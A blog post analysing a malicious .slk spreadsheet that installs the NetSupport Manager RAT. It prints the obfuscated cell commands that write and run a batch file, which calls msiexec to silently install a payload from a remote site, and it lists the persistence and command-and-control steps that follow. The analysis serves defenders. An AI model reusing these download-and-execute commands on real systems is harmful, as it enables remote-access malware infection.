.slk files and NetSupport

Well.

This file didn’t behave normally at all. You could try to dump macros, but nothing would pop up (correction: I did not try olevba.py by @decalage2; this tool did correctly parse the file). Upon opening the document, you see all of these new child cmd.exe processes along with ping? That certainly wasn’t normal.

So I just decided to open it in notepad and see what I could see.

netsupport_03
Curiouser and curioser…

It turns out that even though this opens up in Excel, we can’t treat it as a regular excel spreadsheet at all. This is a .slk file, a.k.a. a SYmbolic LinK file. “It is used to exchange data between applications, specifically spreadsheets.” All of the code you see above are used to display the data when you open the .slk file.

If you scroll down far enough, you see our malicious code.

netsupport_04.png

The lines prefixed with the letter C are used for cell contents. We can see that EXEC (likely means ‘execute’) is used and some commands follow them. Let’s put them together.

"cmD.exe /c EChO|SE^t /p=""@echo off&wmic process call create 'Msie"">%temp%\OyHwU.bat"
"cmD.exe /c @echo off&ping 5&EcHo|s^et /p=""xec /ihttp^:^/^/^ahoyassociate"">>%temp%\OyHwU.bat"
"cmD.exe /c @echo off&ping 5&ping 5&EcHo|s^et /p=""s.com/contacts.php "">>%temp%\OyHwU.bat"
"cmD.exe /c @echo off&ping 5&ping 5&ping 5&EcHo|s^et /p="" ^/q'"">>%temp%\OyHwU.bat&%temp%\OyHwU.bat"

We can see that amongst all of the ping commands,  a series of strings get sent to a new .bat file in the %temp% folder and then executed. Investigating the .bat file confirms this. Put the whole string together and we see that Msiexec is used to install (/i) a file from a website (ahoyassociates.com) and do so quietly (/q).

@echo off&wmic process call create 'Msiexec /ihttp^:^/^/^ahoyassociates.com/contacts.php ^/q'

Although contacts.php is downloaded, it is really a .msi file.

netsupport_05.png

Once the .msi file is installed, it dumps a file called file.cab. It is then expanded using this command:

"C:\Windows\System32\expand.exe" -R files.cab -F:* files

files.cab is expanded to a file called safetycheck.exe. There is a great amount of activity after safetycheck.exe is executed. There is a long chain of cmd.exe ending with a powershell command being executed.

netsupport_06.png

Unfortunately, I wasn’t able get a copy from the any.run output of the .ps1 file that is dropped (but it looks like it might be here in this post) , but we can see that it does a couple of things:

  1. msiexec.exe: Reach out to http[:]//safuuf7774[.]pw/iplog/newg.php?hst=installing_USER-PC
  2. Reg.exe: \CurrentVersion\Run is modified to automatically start an executable named fonthost.exe.
  3. fonthost.exe (which got dropped from the powershell command)
    1. fonthost is the NetSupport Manager RAT
    2. It reaches out to 185.163.45.118/fakeurl.htm and starts sending encoded traffic back and forth.
  4. msiexec.exe: Looks like another attempt to reach out to the same URL as above.

 

So .slk files are not too difficult to analyze. But what comes after them may be far more complicated.

Thanks for reading.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s